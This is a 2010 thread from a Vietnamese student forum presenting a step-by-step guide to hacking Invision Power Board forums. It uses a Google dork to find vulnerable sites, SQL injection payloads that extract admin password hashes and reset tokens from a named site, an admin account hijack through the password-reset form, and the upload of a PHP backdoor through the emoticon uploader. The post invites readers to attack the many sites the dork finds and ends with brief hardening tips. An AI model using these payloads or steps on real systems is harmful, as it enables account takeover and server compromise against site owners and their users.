ĐTVT K8C - CNTT - DH THÁI NGUYÊN
Chào mừng các bạn đến với
http://dtvtk8c.tk


Hãy đăng kí thành viên để dowload và cùng chia sẻ tài liệu bạn nhé!


Chuc cac ban vui ve!
ĐTVT K8C - CNTT - DH THÁI NGUYÊN
Chào mừng các bạn đến với
http://dtvtk8c.tk


Hãy đăng kí thành viên để dowload và cùng chia sẻ tài liệu bạn nhé!


Chuc cac ban vui ve!
ĐTVT K8C - CNTT - DH THÁI NGUYÊN
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

ĐTVT K8C - CNTT - DH THÁI NGUYÊN

***** Đại học công nghệ thông tin và truyền thông****
 
Trang ChínhTìm kiếmLatest imagesĐăng kýĐăng Nhập
 (199)
KIM JONG WOO (154)
vantoan2210 (97)
nguyen van luan (59)
ngancute (46)
nguyenhieu_ict_90 (39)
trexanh078 (30)
MrPrince (30)
bebu_dtvtk8c (29)
boygenerous (27)
♥ Top 20 Bài Viết Mới Nhất ♥
Quà Tặng Âm Nhạc
Cfviet Người yêu cầu:
Cfviet Vào lúc: 6/6/2012, 6:25 pm
Cfviet Gửi đến: »Tất cả các thành viên
Cfviet Người yêu cầu: my_dtvt_dtc
Cfviet Vào lúc: 5/5/2012, 10:21 am
Cfviet Gửi đến: chúc mọi người thi tốt trong kì thi nha^^ good luck.
Cfviet Người yêu cầu:
Cfviet Vào lúc: 28/3/2012, 12:46 pm
Cfviet Gửi đến: »Tất cả các thành viên
Cfviet Người yêu cầu: ngancute
Cfviet Vào lúc: 27/2/2012, 9:09 am
Cfviet Gửi đến: »Tất cả các thành viên
Cfviet Người yêu cầu: MrPrince
Cfviet Vào lúc: 20/12/2011, 7:34 pm
Cfviet Gửi đến: »Tất cả các thành viên

Cfviet Gủi Tặng Nhạc & Lời Nhắn   Click   Click

Lời nhắn:thi tốt nhé! các bạn lớp K8C
Lời nhắn:Thư giãn 1 tí bằng bài nhạc nhẹ nha.... Chúc Các Bạn Vui vẻ...
Lời nhắn:chúc cả nhà ngày mới tốt lành
Lời nhắn:Baby-Justin Bieber
♥ Dtvtk8c.tk ♥

Share | 

 

 Huong dan hack forum

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down 
Huong dan hack forum Link_public_galleries2/10/2010, 1:08 am



trexanh078

posts : 30
Points : 55
nick yahoo: : 65535
Ngày Tham Gia Diễn Đàn : 02/10/2010

Bài gửiTiêu đề: Huong dan hack forum

 
Nói về kỹ thuật upload backdoor lên hosting qua việc hack forum !

hò! Mấy hôm trước trungthep và dinhcaohack và dondoc... và một số anh em có bàn về lỗi BUG GAME Arcade trong Forum VBB! Rồi ###### dondoc dưa cai link bug : ==>>milw0rm.com/exploits/1296 thấy hay hay! và thấy răng bên VBB thì khó mà lấy được pass của Admin để Login vào ACP! nên quyết định chọn thằng IBP để hack ! và chắc là có thể lấy được pass Login của Admin! để rồi có thể upload backdoor lên hosting ! ok

bây giờ nhìn vào phàn Bug xem nào!:


Quote:
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]

đây là phần Bug ở phần Game Arcade! nó có 2 loại dành cho cả IBP và VBB! ngoài cái Bug này thì phần Arcade này còn dính một số Bug nũă! nhưng mà khó khai thác và có cái ko thể khai thác được!

ok! vậy thì tìm site dính BUG xem nào : vào Google tìm với từ khóa :

Quote:
allinurl:"index.php?act=Arcade"


Có đến hơn 100 nghàn Site dạng kiểu đó ! thoải mái tìm Site để anh em check và hack! hò!

mình chọn ==>>nubcake.com/index.php?act=Arcade

Thêm cái này sau index.php? act=Arcade&module=report&user=1
và link BUG của nó sẽ là: hxxp://==>>nubcake.com/index.php?act=Arcade&module=report&user=1
Test Bug: Thêm dấu ' vào:

báo lỗi :

Quote:
:
mySQL query error: SELECT name FROM ibf_members WHERE id=1'

mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
mySQL error code:
Date: Tuesday 04th of April 2006 01:07:27 PM




SQL inject roài! muốn biết cách khai thác thì các bạn có thể đọc bài viết về tư duy! kỹ thuật khai thác SQL trong Forum tại đây: https://www.vniss.net/xforce/showthread.php?t=400

còn ta có link khai thác Pass của admin là là: CODE==>>nubcake.com/index.php?act=Arcade&module=report&user=-1%20union%20select%20password%20from%20ibf_members%20where%20id=1
hiện ra:

Quote:
Player Details for 8005125c396680661893d36fc0723158


Pass Hash đấy! bạn có thể FAKE IP để vào forum thành Admin ! OK

nhưng mà bây giờ Trungthep sẽ nói đến phương án khác!vì nếu dừng lại ở đó! thì bạn chỉ có mỗi pass Admin ở dạng PASS HASH đã mã hóa MD5 rồi! Như vậy thì chỉ có thể vào Forum! mà ko thể vào ACP đựoc! vậy bây giờ chúng ta sẽ tìm cách để có thể có pass admin ở để Login vào ACP!

đầu tiên là bạn tìm xem nick Admin của nó! xem số Id của nó là bâo nhiêu? thông thường là 1! ok! sau đó vào chọn phần quên mật khẩu!

vào: ==>>nubcake.com/index.php?act=Reg&CODE=10

nhập vào đó tên của admin mà mình muốn lấy Pass! nhập vào : Rob

ok! có trường hợp thì phải nhập Email! mà muốn lấy Email thì dùng luôn câu lệnh Select mà lấy email của admin site đó luôn! dễ thôi mà! ok!

sau đó ! bạn vào quay trở lại link Bug! và sử dụng câu lệnh truy vấn để Select cái Pass mà Server gửi cho admin Rob đó! giải thích về loại pass này thì khi mà mình forgot Pass thì Server sẽ tạo cho Victim 1 cái pass mã hóa (mã hóa theo MD5) và sẽ gửi link đến mail đã đằng ký cho Victim. và khi Run cái đoạn link đó! thì sẽ có 1 link form hiện ra cho phép mình nhập pass mới vào! mà ko cần nhập vào pass cũ!

ok Link của nó có dạng:



Quote:
http /www.XXXXXindex.php?act=Reg&CODE=lostpassform&uid=1 &aid=1b3f179f8e33ddd90a601f7e0f0919c1


sẽ xuất hiện Activation Form

và 1b3f179f8e33ddd90a601f7e0f0919c1 chính là pass để Set pass mới !


và quan trọng là khi mà mình Forgot Pass thì DATBASE sẽ tạo ra một pass mới cho Victim và nó sẽ tạm thời lưu trong table ibf_validating ! và nó nằm trong column password !

ok! bây giờ nếu muốn hiẻu đựoc rõ hơn! thì bạn nên đoc kỹ bài viết về tư duy! kỹ thuật khai thác SQL trong Forum tại đây: https://www.vniss.net/xforce/showthread.php?t=400 cho thật kỹ thì sẽ hiểu vì sao tôi chỉ Select có mỗi column password trong table ibf_validating thôi! ok!

bây giờ câu lệnh để lấy cái pass được mã hóa Md5 ! dùng cho việc Set lại Pass mới là:
Quote:
%20UNION%20SELECT%20v.vid%20FROM%20ibf_validating% 20v%2cibf_topics%20t%20WHERE%20v.member_id=1



vậy link của nó là: hxxp://nubcake.com/index.php?act=Arcade&module=report&user=-1%20%20UNION%20SELECT%20v.vid%20FROM%20ibf_validating%20v%2cibf_topics%20t%20WHERE%20v.member_id=1

sẽ thấy :



đó chính là phần pass để Reset Pass mới!

sau đó bạn vào phần sau :

Quote:
http /www.XXXXXindex.php?act=Reg&CODE=lostpassform&uid=1 &aid=1b3f179f8e33ddd90a601f7e0f0919c1



thay phần bôi đó này bằng cái Pass reset mới hack đựoc đó!

ok:

lúc nào thấy xuất hiện Form sau:





thì nhập Pass mới mà bạn muốn sử dụng vào : ví dụ Vniss (nhập 2 cái giống nhau nhé !OK)

sau đó thì đơn giản! chỉ việc Login vào forum! và sau đó bạn vào ACP (cái này nếu mà Forum dùng Pass Sec thì sẽ khó khăn hớn nếu dạng pass Sec mà nằm trong Data thì sử dụng câu lệnh Selec mà tìm ra cái pass Sec đó ! còn nếu dạng pass defaul thì khó khăn đấy! Pass Defaul là dạng Admin Site đó tự mã hóa một cái pass và sau đó paste vào trong Code file admin.php , như thế thì chỉ còn cách hack Local mới biết được pass Sec đó thôi! hiiiii) còn cái này thì không có pass Sec! sướng quá! ok!

vào ==>>nubcake.com/admin.php
Login vào! và sau đó chọn phần Manage Emoticon nhấp chuột vào đó! và chọn phần upload Emoticon! ok!





vì thằng ÌBP không Fix phần upload Emoticon là chỉ có IMAGE nên ta có thể uplaod lên dây 1 file php! và bạn hãy upload lên 1 con backdoor! ok!

link của nó sau khi upload sẽ là: ==>>nubcake.com/html/emoticons/xxx.php

ok! Run lên! là bạn sẽ có 1 backdoor trên hosting rồi đó!

nói thêm về cách upload backdoor trong ACP thì các bạn có thể upload qua XML nữa! cái này làm sao upload đựoc thì các bạn hãy tự nghiên cứu xem sao nhé! nó cũng khá là dễ! hiiiiiii đơn giản lắm! các phiên bản về sau này thì càng có nhiều nới upload backdoor trong ACP! hãy tìm hiểu đi!ok!

Lời khuyên cho các quản trị:

_ Khi làm một Mod Game hay thứ nào đó hãy kiểm tra code trứoc! check xem có bug ko!
_nên xây dựng thêm Pass Sec Login vào ACP để Forum an toàn hơn!
_Chmod thật kỹ các thư mục : UPLOADS ! thư mục EMOTICON !... và các thư mục có khả năng cho upload khác nữa!
_ hạn chế việc cho phép các MEM, User upload file lên hosting!
........

thỉnh thoảng vào các Site bảo mật! hacking... để cập nhật các Infor về lỗi bảo mật và thông tin liên quan!

CODEđoạn này
%20UNION%20SELECT%20v.vid%20FROM%20ibf_validating% 20v%2cibf_topics%20t%20WHERE%20v.member_id=1
có thể chuyển thành
%20UNION%20SELECT%20v.vid%20FROM%20ibf_validating%20WHERE%20v.member_id=1
cho đơn giản, hash sẽ show ở "total games played by"


Trích dẫn
với IPB 2.0.x vào index.php?showuser=1 để xem Username trc khi ForgotPass
với 2.1.x vào

ngoài ra ở IPB 2.1.x sẽ có display name nên ta phải inject
%20UNION%20SELECT%20name%20FROM%20ibf_members%20WHERE%20id=1



Huong dan hack forum Link_public_galleries4/7/2011, 10:35 pm

♥

TOP_1


TOP_1

http://www.dtvtk8c.tk
posts : 199
Points : 2147483647
nick yahoo: : 1
Ngày Tham Gia Diễn Đàn : 12/01/2010
Độ Tuổi : 33
Đến từ : Hải Dương

Bài gửiTiêu đề: Re: Huong dan hack forum

 
? Sad

 

Huong dan hack forum

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang 
Trang 1 trong tổng số 1 trang

Permissions in this forum:Bạn không có quyền trả lời bài viết
ĐTVT K8C - CNTT - DH THÁI NGUYÊN :: CÔNG NGHỆ VÀ PHẦN MỀM :: -‘๑’-DANH CHO.......HACKER.......PRO !-‘๑’--

♫ : ♥ DTVT K8C ♥
(¯`'•.¸º-:¦:-†Vì Một Tập Thể Vững Đoàn Kết & Vững Mạnhº-:¦:-†♥¸.•'´¯)
Chúc Các Bạn Luôn Vui Vẻ
♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥



Note:Diễn đàn hiển thị tốt nhất trên firefox!
Free forum | ©phpBB | Free forum support | Báo cáo lạm dụng | Cookies | Thảo luận mới nhất